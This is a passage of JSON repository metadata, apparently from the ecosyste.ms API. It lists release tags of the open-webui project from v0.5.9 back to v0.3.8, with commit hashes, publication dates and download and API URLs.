l":"pkg:github/open-webui/open-webui@v0.5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.9/manifests"},{"name":"v0.5.8","sha":"dc3b2f1f1e60dadfe6ca22e208b0f00d36f6a0f1","kind":"commit","published_at":"2025-02-05T09:16:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.8/manifests"},{"name":"v0.5.7","sha":"b72150c881955721a63ae7f4ea1b9ea293816fc1","kind":"commit","published_at":"2025-01-23T21:47:40.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.7/manifests"},{"name":"v0.5.6","sha":"9dd45ddf7c5cea09be434278edf68f3fdb23dcfd","kind":"commit","published_at":"2025-01-22T22:13:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.6/manifests"},{"name":"v0.5.5","sha":"568dbc545cdd7e1d08e0db7851bace82db04a418","kind":"commit","published_at":"2025-01-22T19:34:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.5/manifests"},{"name":"v0.5.4","sha":"506dc0149ca973e20768fa3d6f171afac289f606","kind":"commit","published_at":"2025-01-05T09:38:42.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.4/manifests"},{"name":"v0.5.3","sha":"4bc9904b3cd0726d3f9c3cbaeade972cf167b6c4","kind":"commit","published_at":"2024-12-31T21:41:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"e42cbf07f5a0c1fea2441e37f36f06510a2a781d","kind":"commit","published_at":"2024-12-27T07:51:49.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"2bdf99b398cf2f5ee3e15672aeecd542a5bf067d","kind":"commit","published_at":"2024-12-26T06:31:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"22132e155aa7e8522f4c79a7aae4bcfc0d7f6b0d","kind":"commit","published_at":"2024-12-25T18:39:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.0/manifests"},{"name":"v0.4.8","sha":"29a271959556743e6deb4d55a5a982983335d7ab","kind":"commit","published_at":"2024-12-07T08:42:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"c4ea31357f49d08a14c86b2bd85fdcd489512e91","kind":"commit","published_at":"2024-12-01T08:42:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"0a26c41c7b58300f37348ba580a4f0d682ca5fbd","kind":"commit","published_at":"2024-11-27T04:24:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.6/manifests"},{"name":"v0.4.5","sha":"4831c9e57e35a0619d9212b7b573e2c6a9443c8c","kind":"commit","published_at":"2024-11-26T09:55:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.5/manifests"},{"name":"v0.4.4","sha":"db929b5d5ec1694a80ae707a74a52a6dac9f7451","kind":"commit","published_at":"2024-11-23T03:27:41.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"c13bcfdfc9fcb9b72e516cb72c89f234511c89df","kind":"commit","published_at":"2024-11-22T06:47:45.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"6f4bc9864c9ca613fc0dae3ba1db3accfe1d1e5e","kind":"commit","published_at":"2024-11-20T20:24:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"02e94c826440162e381cad382d3ac1b0eb2b3d73","kind":"commit","published_at":"2024-11-20T04:17:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"3c334320921caaeac8ec587dc2e227e3a886177c","kind":"commit","published_at":"2024-11-19T22:28:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.0/manifests"},{"name":"v0.3.35","sha":"f1f068f458c07909247484b69bcb9a0e96b4eaeb","kind":"commit","published_at":"2024-10-26T20:17:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.35","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.35/manifests"},{"name":"v0.3.34","sha":"f10c729e3d1a1cfc82be5bf970ac3716649f472e","kind":"commit","published_at":"2024-10-26T07:44:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.34","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.34","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.34/manifests"},{"name":"v0.3.33","sha":"99dd7fb5a836511e02e2a3761aeab75f2e8b5687","kind":"commit","published_at":"2024-10-24T20:36:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.33","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.33/manifests"},{"name":"v0.3.32","sha":"bc29d5d3c3534c7e42eb3bdf5fa5e11e7a287aaa","kind":"commit","published_at":"2024-10-07T05:06:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.32","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.32/manifests"},{"name":"v0.3.31","sha":"c8c41e07e96140253eae07746ae24a120f9f33b7","kind":"commit","published_at":"2024-10-07T01:50:06.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.31","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.31/manifests"},{"name":"v0.3.30","sha":"7b8f923981b004d6183cd6e4f95b408b613baf9e","kind":"commit","published_at":"2024-09-26T02:13:54.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.30","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.30/manifests"},{"name":"v0.3.29","sha":"82cda6e52204f621882df696a4a26cc20ab482a0","kind":"commit","published_at":"2024-09-25T13:46:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.29","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.29/manifests"},{"name":"v0.3.28","sha":"534e4c90ca5a95d37d325b2e6a54fa36697ee736","kind":"commit","published_at":"2024-09-24T16:52:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.28","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.28/manifests"},{"name":"v0.3.27","sha":"ba20c71963963e58a012eb3d537af7c6c7a543d2","kind":"commit","published_at":"2024-09-24T16:13:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.27","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.27/manifests"},{"name":"v0.3.26","sha":"c0738cef26df70a65898bd8e14dbb4c1dc6937a4","kind":"commit","published_at":"2024-09-24T13:41:42.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.26","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.26/manifests"},{"name":"v0.3.25","sha":"019cf8199f1f4842b8f61cc3143b782433b55779","kind":"commit","published_at":"2024-09-24T12:07:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.25","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.25/manifests"},{"name":"v0.3.24","sha":"7ec72679f0c981e577b71d3f3529ce3e8839521d","kind":"commit","published_at":"2024-09-24T11:32:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.24","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.24/manifests"},{"name":"v0.3.23","sha":"ff8a2da751e4b64441909554965cd51c60f5332a","kind":"commit","published_at":"2024-09-21T02:55:29.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.23","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.23/manifests"},{"name":"v0.3.22","sha":"83855b713b0f211144993486ac5265d3d67bb1f8","kind":"commit","published_at":"2024-09-19T22:25:27.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.22","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.22/manifests"},{"name":"v0.3.21","sha":"50db51ebe08c018bf46acfaf55985ff998da50bc","kind":"commit","published_at":"2024-09-07T23:59:40.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.21","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.21/manifests"},{"name":"v0.3.20","sha":"e2ef36b582b06f1edef0fe84064ce4ae45fa085b","kind":"commit","published_at":"2024-09-07T04:08:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.20/manifests"},{"name":"v0.3.19","sha":"05c0423d6eba64c78fbcfeda4059e54160d2fd35","kind":"commit","published_at":"2024-09-05T18:47:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.19/manifests"},{"name":"v0.3.18","sha":"9204498420c89e347af13fe53b1d0ddcb6379dfc","kind":"commit","published_at":"2024-09-04T18:09:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.18/manifests"},{"name":"v0.3.17","sha":"a9801147b83bfeecc147708941bec1a4b29823cc","kind":"commit","published_at":"2024-09-04T16:40:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.17/manifests"},{"name":"v0.3.16","sha":"693dc3107a71e76e50c0f765b83eaa45acfdab87","kind":"commit","published_at":"2024-08-27T16:49:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.16/manifests"},{"name":"v0.3.15","sha":"847ca660018fe70dc56d29ef86eeee006684058d","kind":"commit","published_at":"2024-08-21T22:28:30.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.15/manifests"},{"name":"v0.3.14","sha":"8a620cab442ab61b1f80c21d6b68df7b020fb10c","kind":"commit","published_at":"2024-08-21T15:36:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.14/manifests"},{"name":"v0.3.13","sha":"13b0e7d64a708f69c5ce58cf0897d9951d0d16ad","kind":"commit","published_at":"2024-08-14T19:45:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.13/manifests"},{"name":"v0.3.12","sha":"c869652ef4907dd123a140d9a08a0c239e690b08","kind":"commit","published_at":"2024-08-07T13:22:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.12/manifests"},{"name":"v0.3.11","sha":"a58dfccb7dab4c7c42c8b4528f1d330bb1626e5f","kind":"commit","published_at":"2024-08-02T22:03:15.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"c74e7df6a04ec942af476332f4660f9d2a95fb7e","kind":"commit","published_at":"2024-07-17T15:51:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"6e843ab563c6843aac3fa5bf13056cdd1ebdbaff","kind":"commit","published_at":"2024-07-17T10:18:37.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"9bcd4ce5c0a01af68c0d2aa44554a68bb741c61b","kind":"commit","published_at":"2024-07-09T21:25:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.8","html_url":"https://github.com/open-webui/open-we